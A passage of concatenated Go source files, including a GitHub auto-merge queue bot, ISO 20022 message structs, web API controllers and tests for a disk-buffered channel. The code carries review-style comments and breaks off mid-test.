	if *autoTipSha != *ev.SHA {
		log.Printf("debug: The commit hash which contained by the status event: %v\n", *ev.SHA)
		// BUG FIX: log the hash value (*autoTipSha); previously the *string
		// pointer was passed, printing a memory address instead of the SHA.
		log.Printf("debug: The commit hash is pinned to the status queue as the tip of auto branch: %v\n", *autoTipSha)
		return false
	}
	return true
}
// mergeSucceedItem reacts to the terminal CI status of the auto branch for
// the currently active queue item. On success it merges the pull request
// (optionally deleting its branch); on failure it comments on the PR and
// adds the fails-tests label. It returns true when the item needs no
// further action (merged, or already resolved).
func mergeSucceedItem(client *github.Client,
	owner string,
	name string,
	repoInfo *setting.RepositoryInfo,
	q *queue.AutoMergeQueue,
	ev *github.StatusEvent) bool {
	active := q.GetActive()
	// ROBUSTNESS FIX: guard against a nil active item instead of panicking
	// on the field access below (GetActive may return nil).
	if active == nil {
		log.Println("error: there is no active item")
		return false
	}
	prNum := active.PullRequest

	prInfo, _, err := client.PullRequests.Get(owner, name, prNum)
	if err != nil {
		log.Println("info: could not fetch the pull request information.")
		return false
	}

	// Nothing to do if someone resolved the PR in the meantime.
	if *prInfo.State != "open" {
		log.Printf("info: the pull request #%v has been resolved the state\n", prNum)
		return true
	}

	if *ev.State != "success" {
		// CI failed: report the statuses and label the PR as failing.
		log.Println("info: could not merge pull request")

		comment := ":collision: The result of what tried to merge this pull request is `" + *ev.State + "`."
		commentStatus(client, owner, name, prNum, comment, repoInfo.AutoBranchName)

		currentLabels := operation.GetLabelsByIssue(client.Issues, owner, name, prNum)
		if currentLabels == nil {
			return false
		}

		labels := operation.AddFailsTestsWithUpsreamLabel(currentLabels)
		_, _, err = client.Issues.ReplaceLabelsForIssue(owner, name, prNum, labels)
		if err != nil {
			log.Println("warn: could not change labels of the issue")
		}
		return false
	}

	comment := ":tada: The result of what tried to merge this pull request is `" + *ev.State + "`."
	commentStatus(client, owner, name, prNum, comment, repoInfo.AutoBranchName)

	if ok := operation.MergePullRequest(client, owner, name, prInfo, active.PrHead); !ok {
		log.Printf("info: cannot merge pull request #%v\n", prNum)
		return false
	}

	if repoInfo.DeleteAfterAutoMerge {
		// Best effort; deletion failures are not reported.
		operation.DeleteBranchByPullRequest(client.Git, prInfo)
	}

	log.Printf("info: complete merging #%v into master\n", prNum)
	return true
}
// commentStatus posts a comment to pull request prNum, appending a bullet
// list of the CI statuses currently recorded on the auto branch (each as a
// bare URL, or a markdown link when a description is available).
func commentStatus(client *github.Client, owner, name string, prNum int, comment string, autoBranch string) {
	status, _, err := client.Repositories.GetCombinedStatus(owner, name, autoBranch, nil)
	if err != nil {
		log.Println("error: could not get the status about the auto branch.")
	}

	if status != nil {
		comment += "\n\n"
		for _, s := range status.Statuses {
			if s.TargetURL == nil {
				continue
			}

			if s.Description == nil || *s.Description == "" {
				comment += fmt.Sprintf("* %v\n", *s.TargetURL)
			} else {
				comment += fmt.Sprintf("* [%v](%v)\n", *s.Description, *s.TargetURL)
			}
		}
	}

	if !operation.AddComment(client.Issues, owner, name, prNum, comment) {
		log.Println("error: could not write the comment about the result of auto branch.")
	}
}
// tryNextItem advances the queue after the active item finished: it pops the
// next eligible item, starts a trial merge against the latest master on the
// auto branch, and pins the item as active. On a failed trial it recurses to
// try the following item. Returns (ok, hasNext); hasNext is false when the
// queue is exhausted.
//
// NOTE(review): because failures recurse, the deferred q.Save() runs once
// per recursion level (saving the queue repeatedly). Also "awating" in the
// log string below is a typo in a runtime string, left unchanged here.
func tryNextItem(client *github.Client, owner, name string, q *queue.AutoMergeQueue, autoBranch string) (ok, hasNext bool) {
	defer q.Save()
	next, nextInfo := getNextAvailableItem(client, owner, name, q)
	if next == nil {
		log.Printf("info: there is no awating item in the queue of %v/%v\n", owner, name)
		return true, false
	}
	nextNum := next.PullRequest
	// TryWithMaster pushes the candidate merged with master onto the auto
	// branch and reports the resulting commit hash.
	ok, commit := operation.TryWithMaster(client, owner, name, nextInfo, autoBranch)
	if !ok {
		log.Printf("info: we cannot try #%v with the latest `master`.", nextNum)
		return tryNextItem(client, owner, name, q, autoBranch)
	}
	// Remember the auto-branch tip so later status events can be matched.
	next.AutoBranchHead = &commit
	q.SetActive(next)
	log.Printf("info: pin #%v as the active item to queue\n", nextNum)
	return true, true
}
// getNextAvailableItem pops items off the merge queue until it finds one
// that is still eligible for auto-merging: the pull request must be open,
// its head must still match the SHA recorded when it was accepted, GitHub
// must report it mergeable, and it must still carry the awaiting-merge
// label. Ineligible items are skipped, with a PR comment or label update
// where appropriate. Returns (nil, nil) when the queue is exhausted.
//
// NOTE(review): the parameter named `queue` shadows the imported `queue`
// package inside the body; kept to preserve the signature, but consider
// renaming it to `q` in a follow-up.
func getNextAvailableItem(client *github.Client,
	owner string,
	name string,
	queue *queue.AutoMergeQueue) (*queue.AutoMergeQueueItem, *github.PullRequest) {
	issueSvc := client.Issues
	prSvc := client.PullRequests

	log.Println("Start to find the next item")
	defer log.Println("End to find the next item")

	for {
		ok, next := queue.TakeNext()
		if !ok || next == nil {
			// TYPO FIX in log message: "awating" -> "awaiting".
			log.Printf("debug: there is no awaiting item in the queue of %v/%v\n", owner, name)
			return nil, nil
		}
		log.Println("debug: the next item has fetched from queue.")
		prNum := next.PullRequest

		nextInfo, _, err := prSvc.Get(owner, name, prNum)
		if err != nil {
			log.Println("debug: could not fetch the pull request information.")
			continue
		}

		// The head accepted into the queue must still be the PR's tip;
		// otherwise the queued approval no longer applies.
		if next.PrHead != *nextInfo.Head.SHA {
			operation.CommentHeadIsDifferentFromAccepted(issueSvc, owner, name, prNum)
			continue
		}

		if state := *nextInfo.State; state != "open" {
			log.Printf("debug: the pull request #%v has been resolved the state as `%v`\n", prNum, state)
			continue
		}

		ok, mergeable := operation.IsMergeable(prSvc, owner, name, prNum, nextInfo)
		if !ok {
			log.Println("info: We treat it as 'mergeable' to avoid miss detection because we could not fetch the pr info,")
			continue
		}

		if !mergeable {
			// Conflicting PR: comment and relabel it, then move on.
			comment := ":lock: Merge conflict"
			if ok := operation.AddComment(issueSvc, owner, name, prNum, comment); !ok {
				log.Println("error: could not write the comment about the result of auto branch.")
			}

			currentLabels := operation.GetLabelsByIssue(issueSvc, owner, name, prNum)
			if currentLabels == nil {
				continue
			}

			labels := operation.AddNeedRebaseLabel(currentLabels)
			log.Printf("debug: the changed labels: %v\n", labels)
			_, _, err = issueSvc.ReplaceLabelsForIssue(owner, name, prNum, labels)
			if err != nil {
				log.Println("warn: could not change labels of the issue")
			}
			continue
		}

		// IDIOM FIX: flattened the redundant `else` branch (the `if` above
		// always continues), keeping the happy path left-aligned.
		label := operation.GetLabelsByIssue(issueSvc, owner, name, prNum)
		if label == nil {
			continue
		}
		if !operation.HasLabelInList(label, operation.LABEL_AWAITING_MERGE) {
			continue
		}

		return next, nextInfo
	}
}
|
package semt
import (
"encoding/xml"
"github.com/thought-machine/finance-messaging/iso20022"
)
// Document01600101 is the XML document wrapper for the ISO 20022
// semt.016.001.01 IntraPositionMovementPostingReport message.
type Document01600101 struct {
	XMLName xml.Name `xml:"urn:iso:std:iso:20022:tech:xsd:semt.016.001.01 Document"`
	// Message is the report payload (element IntraPosMvmntPstngRpt).
	Message *IntraPositionMovementPostingReportV01 `xml:"IntraPosMvmntPstngRpt"`
}
// AddMessage allocates the report payload, attaches it to the document, and
// returns it so the caller can populate it.
func (d *Document01600101) AddMessage() *IntraPositionMovementPostingReportV01 {
	msg := &IntraPositionMovementPostingReportV01{}
	d.Message = msg
	return msg
}
// Scope
// An account servicer sends an IntraPositionMovementPostingReport to an account owner to provide the details of increases and decreases in securities with a given status within a holding, i.e., intra-position transfers, which occurred during a specified period, for all or selected securities in a specified safekeeping account which the account servicer holds for the account owner.
// The account servicer/owner relationship may be:
// - a central securities depository or another settlement market infrastructure acting on behalf of their participants
// - an agent (sub-custodian) acting on behalf of their global custodian customer, or
// - a custodian acting on behalf of an investment management institution or a broker/dealer.
// Usage
// The message may also be used to:
// - re-send a message previously sent (the sub-function of the message is Duplicate),
// - provide a third party with a copy of a message for information (the sub-function of the message is Copy),
// - re-send to a third party a copy of a message for information (the sub-function of the message is Copy Duplicate).
// ISO 15022 - 20022 Coexistence
// This ISO 20022 message is reversed engineered from ISO 15022. Both standards will coexist for a certain number of years. Until this coexistence period ends, the usage of certain data types is restricted to ensure interoperability between ISO 15022 and 20022 users. Compliance to these rules is mandatory in a coexistence environment. The coexistence restrictions are described in a Textual Rule linked to the Message Items they concern. These coexistence textual rules are clearly identified as follows: “CoexistenceXxxxRule”.
type IntraPositionMovementPostingReportV01 struct {
	// Information that unambiguously identifies an IntraPositionMovementPostingReport message as known by the account servicer.
	Identification *iso20022.DocumentIdentification11 `xml:"Id"`
	// Page number of the message (within a statement) and continuation indicator to indicate that the statement is to continue or that the message is the last page of the statement.
	Pagination *iso20022.Pagination `xml:"Pgntn"`
	// General information related to report.
	StatementGeneralDetails *iso20022.Statement15 `xml:"StmtGnlDtls"`
	// Party that legally owns the account. Optional (omitempty).
	AccountOwner *iso20022.PartyIdentification13Choice `xml:"AcctOwnr,omitempty"`
	// Account to or from which a securities entry is made.
	SafekeepingAccount *iso20022.SecuritiesAccount13 `xml:"SfkpgAcct"`
	// Reporting per financial instrument. Optional, repeatable (omitempty).
	FinancialInstrument []*iso20022.FinancialInstrumentDetails1 `xml:"FinInstrm,omitempty"`
	// Party that originated the message, if other than the sender. Optional (omitempty).
	MessageOriginator *iso20022.PartyIdentification10Choice `xml:"MsgOrgtr,omitempty"`
	// Party that is the final destination of the message, if other than the receiver. Optional (omitempty).
	MessageRecipient *iso20022.PartyIdentification10Choice `xml:"MsgRcpt,omitempty"`
}
// AddIdentification allocates and returns the message identification block.
func (i *IntraPositionMovementPostingReportV01) AddIdentification() *iso20022.DocumentIdentification11 {
	value := &iso20022.DocumentIdentification11{}
	i.Identification = value
	return value
}
// AddPagination allocates and returns the pagination block.
func (i *IntraPositionMovementPostingReportV01) AddPagination() *iso20022.Pagination {
	value := &iso20022.Pagination{}
	i.Pagination = value
	return value
}
// AddStatementGeneralDetails allocates and returns the statement details block.
func (i *IntraPositionMovementPostingReportV01) AddStatementGeneralDetails() *iso20022.Statement15 {
	value := &iso20022.Statement15{}
	i.StatementGeneralDetails = value
	return value
}
// AddAccountOwner allocates and returns the account owner block.
func (i *IntraPositionMovementPostingReportV01) AddAccountOwner() *iso20022.PartyIdentification13Choice {
	value := &iso20022.PartyIdentification13Choice{}
	i.AccountOwner = value
	return value
}
// AddSafekeepingAccount allocates and returns the safekeeping account block.
func (i *IntraPositionMovementPostingReportV01) AddSafekeepingAccount() *iso20022.SecuritiesAccount13 {
	value := &iso20022.SecuritiesAccount13{}
	i.SafekeepingAccount = value
	return value
}
// AddFinancialInstrument appends a new per-instrument reporting entry to the
// repeatable FinInstrm sequence and returns it for population.
func (i *IntraPositionMovementPostingReportV01) AddFinancialInstrument() *iso20022.FinancialInstrumentDetails1 {
	entry := &iso20022.FinancialInstrumentDetails1{}
	i.FinancialInstrument = append(i.FinancialInstrument, entry)
	return entry
}
// AddMessageOriginator allocates and returns the message originator block.
func (i *IntraPositionMovementPostingReportV01) AddMessageOriginator() *iso20022.PartyIdentification10Choice {
	value := &iso20022.PartyIdentification10Choice{}
	i.MessageOriginator = value
	return value
}
// AddMessageRecipient allocates and returns the message recipient block.
func (i *IntraPositionMovementPostingReportV01) AddMessageRecipient() *iso20022.PartyIdentification10Choice {
	value := &iso20022.PartyIdentification10Choice{}
	i.MessageRecipient = value
	return value
}
|
package main
import (
"encoding/json"
"fmt"
"os"
)
type (
	// buoyCondition holds the wind readings reported for a station.
	buoyCondition struct {
		WindSpeed     float64 `json:"wind_speed_milehour"`
		WindDirection int     `json:"wind_direction_degnorth"`
		WindGust      float64 `json:"gust_wind_speed_milehour"`
	}

	// buoyLocation contains the buoy's GeoJSON-style location
	// (a type string plus a coordinate pair).
	buoyLocation struct {
		Type        string    `json:"type"`
		Coordinates []float64 `json:"coordinates"`
	}

	// buoyStation contains information for an individual station.
	// (Comment previously said "BuoyStation"; the type is unexported.)
	buoyStation struct {
		StationID string        `json:"station_id"`
		Name      string        `json:"name"`
		LocDesc   string        `json:"location_desc"`
		Condition buoyCondition `json:"condition"`
		Location  buoyLocation  `json:"location"`
	}
)
// main decodes a slice of buoy stations from data.json in the working
// directory and prints each one with field names.
func main() {
	file, err := os.Open("data.json")
	if err != nil {
		fmt.Println("Open File", err)
		return
	}
	// Ensure the file handle is released when main returns.
	defer file.Close()

	var stations []buoyStation
	if err := json.NewDecoder(file).Decode(&stations); err != nil {
		fmt.Println("Decode File", err)
		return
	}

	for _, station := range stations {
		fmt.Printf("%+v\n\n", station)
	}
}
|
package controllers
import (
"encoding/json"
"fmt"
"github.com/astaxie/beego"
)
// init currently performs no setup; it is kept as an explicit (empty)
// package initialization hook.
func init() {
}
// baseApiController embeds beego.Controller and provides shared request
// preparation (auth check + input normalization) for the API controllers.
type baseApiController struct {
	beego.Controller
}
// GetCurrentUser resolves the user identified by the Authorization header
// value. NOTE(review): stub implementation — it ignores the auth parameter
// and always returns {"id": "1"} with a nil error.
func (this *baseApiController) GetCurrentUser(auth string) (auth_str map[string]string, err error) {
	return map[string]string{"id": "1"}, nil
}
// format_input collects the request inputs into Data["input_map"], merging
// (in increasing precedence): named route params, form values (GET/POST),
// URL query parameters, and JSON fields from the request body.
func (this *baseApiController) format_input() {
	// Body JSON: decode errors are deliberately ignored (best effort); a
	// non-JSON body simply contributes no fields.
	body_json := map[string]interface{}{}
	json.Unmarshal(this.Ctx.Input.RequestBody, &body_json)

	input_map := map[string]interface{}{}

	// Named route params arrive as ":key" -> val; strip the leading colon.
	// IDIOM FIX: k[1:] instead of the redundant k[1:len(k)].
	for k, v := range this.Ctx.Input.Params {
		input_map[k[1:]] = v
	}

	// Form holds both GET and POST values as key -> [val]; keep the first.
	for k, v := range this.Ctx.Input.Request.Form {
		input_map[k] = v[0]
	}

	// Input() yields the URL query-string parameters.
	for k, v := range this.Input() {
		input_map[k] = v[0]
	}

	// JSON body fields take the highest precedence.
	for k, v := range body_json {
		input_map[k] = v
	}

	this.Data["input_map"] = input_map
}
// Prepare runs before every action: it rejects requests without an
// Authorization header (401), resolves the current user, and normalizes all
// request inputs into Data["input_map"].
func (this *baseApiController) Prepare() {
	header_auth := this.Ctx.Request.Header.Get("Authorization")
	if header_auth == "" {
		// Abort stops request processing with the registered 401 handler.
		this.Abort("401")
	} else {
		fmt.Println("the header_Auth is ")
		fmt.Println(header_auth)
		// BUG FIX: removed the dead placeholder assignment
		// (`current_user := map[string]string{"name": "name1"}`) that was
		// immediately overwritten by the call below.
		current_user, err := this.GetCurrentUser(header_auth)
		if err != nil {
			this.Data["json"] = map[string]string{"error": err.Error()}
			this.ServeJson()
			// BUG FIX: stop here; previously execution fell through and kept
			// handling the request after the error response was served.
			return
		}
		this.Data["current_user"] = current_user
	}
	this.format_input()
}
// ResponseMsg is the JSON error envelope returned by the error controllers.
type ResponseMsg struct {
	ErrCode int    `json:"errcode"`
	ErrMsg  string `json:"errmsg"`
}
// ErrorController serves JSON error responses for aborted requests
// (beego dispatches ErrorNNN methods by status code).
type ErrorController struct {
	beego.Controller
}
// Error401 renders a JSON body for unauthorized requests instead of the
// default HTML error page.
func (this *ErrorController) Error401() {
	this.EnableRender = false
	this.Data["json"] = ResponseMsg{ErrCode: 401, ErrMsg: "unauthorized"}
	this.ServeJson()
}
// Error400 renders a JSON body for malformed requests instead of the
// default HTML error page.
func (this *ErrorController) Error400() {
	this.EnableRender = false
	this.Data["json"] = ResponseMsg{ErrCode: 400, ErrMsg: "input invalid"}
	this.ServeJson()
}
|
package server
import (
"net/http"
"os"
"time"
log "github.com/sirupsen/logrus"
"github.com/arthur404dev/api/restream"
"github.com/arthur404dev/api/websocket"
"github.com/labstack/echo/v4"
"github.com/labstack/echo/v4/middleware"
)
// Start configures and runs the HTTP API on the given port: permissive CORS,
// API-key authentication via the `api-key` query parameter, request logging,
// a status page, a websocket upgrade endpoint bound to hub, and the restream
// token-exchange endpoint. It blocks until the server exits (log.Fatal).
func Start(port string, hub *websocket.Hub) {
	e := echo.New()
	e.Use(middleware.CORSWithConfig(middleware.CORSConfig{
		AllowOrigins: []string{"*"},
		AllowMethods: []string{http.MethodGet, http.MethodConnect, http.MethodPost},
	}))
	// NOTE(review): the API key travels in the query string, so it can end
	// up in access logs and browser history — consider a header instead.
	e.Use(middleware.KeyAuthWithConfig(middleware.KeyAuthConfig{
		KeyLookup: "query:api-key",
		Validator: func(key string, c echo.Context) (bool, error) {
			return key == os.Getenv("ACCESS_API_KEY"), nil
		},
	}))
	e.Use(loggingMiddleware)
	e.GET("/", statusPage)
	e.GET("/ws", func(c echo.Context) error { return websocket.ServeWs(hub, c) })
	e.POST("/restream/exchange", restream.ExchangeTokens)
	log.WithField("port", port).Info("api is listening and serving...")
	log.Fatal(e.Start(":" + port))
}
// loggingMiddleware logs method, route path, response status, and handler
// latency (in nanoseconds) for every request, then propagates the handler's
// error unchanged.
func loggingMiddleware(next echo.HandlerFunc) echo.HandlerFunc {
	return func(c echo.Context) error {
		start := time.Now()
		err := next(c)

		log.WithFields(log.Fields{
			"method":     c.Request().Method,
			"path":       c.Path(),
			"status":     c.Response().Status,
			"latency_ns": time.Since(start).Nanoseconds(),
		}).Info("request details")

		return err
	}
}
|
package bmlog_test
import (
"github.com/alfredyang1986/blackmirror/bmlog"
"os"
)
// ExampleStandardLogger demonstrates configuring the logger via environment
// variables before emitting an info record. Without an "// Output:" comment,
// `go test` only compiles this example and does not execute it.
func ExampleStandardLogger() {
	// Setenv errors are ignored here; this is illustrative example code.
	os.Setenv("LOGGER_DEBUG", "false")
	os.Setenv("LOGGER_USER", "example")
	os.Setenv("LOG_PATH", "/home/jeorch/work/test/temp/go.log")

	bmlog.StandardLogger().Info("Example Test Info")
}
|
package controller
import (
"github.com/GoAdminGroup/go-admin/context"
"github.com/GoAdminGroup/go-admin/modules/file"
"github.com/GoAdminGroup/go-admin/plugins/admin/modules/constant"
"github.com/GoAdminGroup/go-admin/plugins/admin/modules/guard"
"github.com/GoAdminGroup/go-admin/plugins/admin/modules/response"
)
// ApiCreate handles the JSON create endpoint: it uploads any attached files
// through the configured file engine, inserts the submitted form values via
// the table panel, and responds with OK or a JSON error.
func (h *Handler) ApiCreate(ctx *context.Context) {
	param := guard.GetNewFormParam(ctx)

	if len(param.MultiForm.File) > 0 {
		engine := file.GetFileEngine(h.config.FileUploadEngine.Name)
		if err := engine.Upload(param.MultiForm); err != nil {
			response.Error(ctx, err.Error())
			return
		}
	}

	if err := param.Panel.InsertData(param.Value()); err != nil {
		response.Error(ctx, err.Error())
		return
	}

	response.Ok(ctx)
}
// ApiCreateForm returns the JSON description of the "new record" form for a
// table: the form fields, the info/new URLs, primary key, header/footer
// HTML fragments, a CSRF-style token, and the rendered footer buttons.
func (h *Handler) ApiCreateForm(ctx *context.Context) {
	var (
		params           = guard.GetShowNewFormParam(ctx)
		prefix, paramStr = params.Prefix, params.Param.GetRouteParamStr()
		panel            = h.table(prefix, ctx)
		formInfo         = panel.GetNewFormInfo()
		infoUrl          = h.routePathWithPrefix("api_info", prefix) + paramStr
		newUrl           = h.routePathWithPrefix("api_new", prefix)
		referer          = ctx.Referer()
		f                = panel.GetActualNewForm()
	)
	// Prefer returning the user to where they came from, unless the referer
	// is itself an info or new page.
	if referer != "" && !isInfoUrl(referer) && !isNewUrl(referer, ctx.Query(constant.PrefixKey)) {
		infoUrl = referer
	}
	response.OkWithData(ctx, map[string]interface{}{
		"panel":  formInfo,
		"urls": map[string]string{
			"info": infoUrl,
			"new":  newUrl,
		},
		"pk":     panel.GetPrimaryKey().Name,
		"header": f.HeaderHtml,
		"footer": f.FooterHtml,
		"prefix": h.config.PrefixFixSlash(),
		"token":  h.authSrv().AddToken(),
		"operation_footer": formFooter("new", f.IsHideContinueEditCheckBox, f.IsHideContinueNewCheckBox,
			f.IsHideResetButton, f.FormNewBtnWord),
	})
}
|
package pelichan
import (
"github.com/beeker1121/goque"
"log"
"math/rand"
"net/http"
_ "net/http/pprof"
"os"
"strconv"
"sync"
"testing"
"time"
)
// TODO: DeqErrCB and DecErrCB tests
// init starts a pprof HTTP server on localhost:6060 so long-running tests
// can be profiled, and seeds math/rand for the randomized abort points used
// by the tests below.
func init() {
	go func() {
		log.Println(http.ListenAndServe("localhost:6060", nil))
	}()
	rand.Seed(time.Now().UnixNano())
}
// MyStr is a string-carrying test payload round-tripped through the
// disk-buffered channel.
type MyStr struct {
	Data string
}
// MyInt is an int-carrying test payload used by the consistency checks.
type MyInt struct {
	Data int
}
// DecMyStr decodes a persisted goque item back into a *MyStr.
func DecMyStr(item *goque.Item) (interface{}, error) {
	var obj *MyStr
	if err := item.ToObject(&obj); err != nil {
		return obj, err
	}
	return obj, nil
}
// DecMyInt decodes a persisted goque item back into a *MyInt.
func DecMyInt(item *goque.Item) (interface{}, error) {
	var obj *MyInt
	if err := item.ToObject(&obj); err != nil {
		return obj, err
	}
	return obj, nil
}
const dbDirectory = "TMPDB"
// prepChan builds a DiskBufferedChan over dbDirectory for a test, wiring a
// fresh source channel (buffer indepth) to a sink (buffer outdepth) and
// using decCB to decode items persisted to disk. Construction failure is
// fatal to the test.
//
// The multi-assign `:=` below reuses the named results dbch and sink (only
// err is newly declared), so the naked `return` hands them back.
// NOTE(review): the named result `abort` is never assigned and is always a
// nil channel for callers — confirm this is intentional.
func prepChan(t *testing.T, indepth, outdepth int,
	decCB func(item *goque.Item) (interface{}, error)) (
	dbch *DiskBufferedChan,
	src chan interface{},
	sink <-chan interface{},
	abort chan struct{}) {
	src = make(chan interface{}, indepth)
	dbch, sink, err := NewDiskBufferedChan(dbDirectory, outdepth, decCB, src, &testLogger{t})
	if err != nil {
		t.Fatalf("Error: %s", err)
	}
	return
}
// suck drains sink until it is closed and returns the number of items read.
// The *testing.T parameter is currently unused but kept for signature
// compatibility with the call sites.
func suck(t *testing.T, sink <-chan interface{}) (cnt int) {
	for {
		if _, ok := <-sink; !ok {
			return cnt
		}
		cnt++
	}
}
// iters is the number of items each test pushes through the channel.
const iters = 10

// sleepTime paces sends so background goroutines get scheduled between them.
const sleepTime = time.Millisecond * 50
// TestDiskBufferedChan_SimpleDirect verifies that when the sink keeps up
// with the source, every item is forwarded directly and nothing is written
// to or read from disk.
func TestDiskBufferedChan_SimpleDirect(t *testing.T) {
	os.RemoveAll(dbDirectory)
	d, src, sink, _ := prepChan(t, 0, 0, DecMyStr)
	// Consumer drains exactly iters items.
	go func() {
		for i := 0; i < iters; i++ {
			<-sink
		}
	}()
	// Paced sends give the consumer time, so each send forwards directly.
	for i := 0; i < iters; i++ {
		src <- &MyStr{"Data_" + strconv.Itoa(i)}
		time.Sleep(sleepTime)
	}
	fwd, wr, rd := d.GetStats()
	d.Close()
	t.Logf("Pipe stats:\nDirect: %d\nWrites: %d\nReads: %d\n", fwd, wr, rd)
	if fwd != uint64(iters) {
		t.Fatalf("Non direct send detected!")
	}
	if wr > 0 || rd > 0 {
		t.Fatalf("Parasite reads/writes detected")
	}
}
// TestDiskBufferedChan_SimpleDirectPartial verifies the mixed case: the
// consumer takes only half the items at first, so the first half forwards
// directly and the second half spills to disk and is read back later.
func TestDiskBufferedChan_SimpleDirectPartial(t *testing.T) {
	os.RemoveAll(dbDirectory)
	d, src, sink, _ := prepChan(t, 0, 0, DecMyStr)
	// Consumer drains only the first half.
	go func() {
		for i := 0; i < iters/2; i++ {
			<-sink
		}
	}()
	for i := 0; i < iters; i++ {
		src <- &MyStr{"Data_" + strconv.Itoa(i)}
		time.Sleep(sleepTime)
	}
	// Let the buffered half settle on disk, then drain the remainder.
	time.Sleep(sleepTime * 5)
	for i := 0; i < (iters - iters/2); i++ {
		<-sink
	}
	fwd, wr, rd := d.GetStats()
	d.Close()
	t.Logf("Pipe stats:\nDirect: %d\nWrites: %d\nReads: %d\n", fwd, wr, rd)
	if fwd != uint64(iters/2) {
		t.Fatalf("Non direct sends are more than half!")
	}
	if wr != rd || wr != (iters-iters/2) {
		t.Fatalf("Parasite reads/writes detected")
	}
}
// TestDiskBufferedChan_SuddenAbort halts the channel mid-stream at a random
// item and checks that after the halt the source blocks on the very next
// send, and that the items delivered before the halt plus the leftovers
// recovered from disk add up to everything sent.
func TestDiskBufferedChan_SuddenAbort(t *testing.T) {
	os.RemoveAll(dbDirectory)
	d, src, sink, _ := prepChan(t, 0, 0, DecMyStr)
	var sendBlockedOn = -1
	var sum1 int
	go func() {
		sum1 = suck(t, sink)
	}()
	var abortNum = (rand.Int() % (iters - 1)) + 1
OUT:
	for i := 1; i <= iters; i++ {
		select {
		case src <- &MyStr{"Data_" + strconv.Itoa(i)}:
		// BUG FIX: time.After instead of time.Tick — time.Tick allocates a
		// new Ticker on every loop iteration that is never stopped (leaks).
		// time.After gives the same one-shot 1s timeout per iteration.
		case <-time.After(time.Second):
			t.Logf("Send timeout abort on '%d'", i)
			sendBlockedOn = i
			break OUT
		}
		if i == abortNum {
			t.Logf("Sudden abort on %d", i)
			d.Halt()
			//close(d.chHalt) // Hacky abort without wait for completion
			//<-d.chFWDone // ...well, with a bit, to ensure precise timeout iteration
		}
	}
	fwd, wr, rd := d.GetStats()
	close(src)
	d.Close()
	t.Logf("Pipe stats:\nDirect: %d\nWrites: %d\nReads: %d\n", fwd, wr, rd)
	// NOTE(review): sum1 is written by the suck goroutine and read here
	// without explicit synchronization; Close() presumably closes the sink
	// first — confirm, or add a done channel.
	t.Logf("Received: %d\n", sum1)
	if sendBlockedOn != abortNum+1 {
		t.Fatalf("Source send timeout on wrong item, expected '%d', got '%d'", abortNum+1, sendBlockedOn)
	}
	// Get leftover records
	d2, src, sink2, _ := prepChan(t, 0, 0, DecMyStr)
	close(src)
	sum2 := suck(t, sink2)
	d2.Close()
	fwd, wr, rd = d2.GetStats()
	t.Logf("Pipe stats:\nDirect: %d\nWrites: %d\nReads: %d\n", fwd, wr, rd)
	t.Logf("Received: %d\n", sum2)
	if (sum1 + sum2) != abortNum {
		t.Fatalf("Record number mismatch: %d/%d", sum1+sum2, abortNum+1)
	}
}
// TestDiskBufferedChan_StuckSink never reads the sink, so nothing may be
// forwarded directly and every item must be persisted; a second channel
// instance over the same directory must recover all of them.
func TestDiskBufferedChan_StuckSink(t *testing.T) {
	os.RemoveAll(dbDirectory)
	d, src, _, _ := prepChan(t, 0, 0, DecMyStr)
OUT:
	for i := 0; i < iters; i++ {
		select {
		case src <- &MyStr{"Data_" + strconv.Itoa(i)}:
		// BUG FIX: time.After instead of time.Tick — time.Tick allocates a
		// new Ticker on every loop iteration that is never stopped (leaks).
		case <-time.After(time.Second):
			t.Logf("Send timeout abort on '%d'", i)
			break OUT
		}
	}
	d.Close()
	fwd, wr, rd := d.GetStats()
	t.Logf("Pipe stats:\nDirect: %d\nWrites: %d\nReads: %d\n", fwd, wr, rd)
	if fwd > 0 {
		t.Fatalf("Impossible forwards on stuck sink, test broken")
	}
	// Now check what is on disk
	d2, src, sink2, _ := prepChan(t, 0, 0, DecMyStr)
	close(src)
	sum := suck(t, sink2)
	d2.Close()
	fwd, wr, rd = d2.GetStats()
	t.Logf("Pipe stats:\nDirect: %d\nWrites: %d\nReads: %d\n", fwd, wr, rd)
	if rd != uint64(iters) {
		t.Fatalf("Record stat number mismatch: %d/%d", rd, iters)
	}
	if sum != iters {
		t.Fatalf("Received number mismatch: %d/%d", sum, iters)
	}
}
// TestDiskBufferedChan_SourceClose checks that closing the source still
// delivers every already-sent item to the sink before the sink closes.
func TestDiskBufferedChan_SourceClose(t *testing.T) {
	os.RemoveAll(dbDirectory)
	d, src, sink, _ := prepChan(t, 0, 0, DecMyStr)
	defer d.Close()
	for i := 1; i <= iters; i++ {
		src <- &MyStr{"Data_" + strconv.Itoa(i)}
	}
	close(src)
	fwd, wr, rd := d.GetStats()
	t.Logf("Pipe stats:\nDirect: %d\nWrites: %d\nReads: %d\n", fwd, wr, rd)
	gotnum := suck(t, sink)
	t.Logf("Got %d/%d", gotnum, iters)
	if gotnum != iters {
		t.Fatalf("Expected %d items, got %d", iters, gotnum)
	}
}
// TestDiskBufferedChan_SourceCloseAndHalt closes the source, halts the
// channel asynchronously partway through draining, and verifies that a new
// channel instance over the same directory delivers the remaining items so
// the grand total matches what was sent.
func TestDiskBufferedChan_SourceCloseAndHalt(t *testing.T) {
	os.RemoveAll(dbDirectory)
	d, src, sink, _ := prepChan(t, 0, 0, DecMyStr)
	for i := 1; i <= iters; i++ {
		src <- &MyStr{"Data_" + strconv.Itoa(i)}
	}
	close(src)
	fwd, wr, rd := d.GetStats()
	t.Logf("Pipe stats:\nDirect: %d\nWrites: %d\nReads: %d\n", fwd, wr, rd)
	// Halt at a random point while draining; remaining items stay on disk.
	var abortNum = (rand.Int() % (iters - 1)) + 1
	var cnt = 0
	for range sink {
		cnt++
		if abortNum == cnt {
			d.HaltAsync()
		}
	}
	t.Logf("Got %d/%d, aborted on %d", cnt, iters, abortNum)
	d.WaitHalt()
	d.Close()
	// Reopen and drain the leftovers.
	d, src, sink, _ = prepChan(t, 0, 0, DecMyStr)
	defer d.Close()
	close(src)
	for range sink {
		cnt++
	}
	t.Logf("Got %d/%d", cnt, iters)
	if cnt != iters {
		t.Fatalf("Expected %d items, got %d", iters, cnt)
	}
}
// TestDiskBufferedChan_SourceCloseBufferedSink gives the sink enough buffer
// for every item; after the source closes, the disk queue must be empty
// (everything fits in the sink buffer) and the sink must yield all items.
func TestDiskBufferedChan_SourceCloseBufferedSink(t *testing.T) {
	os.RemoveAll(dbDirectory)
	d, src, sink, _ := prepChan(t, 0, iters, DecMyStr)
	defer d.Close()
	for i := 1; i <= iters; i++ {
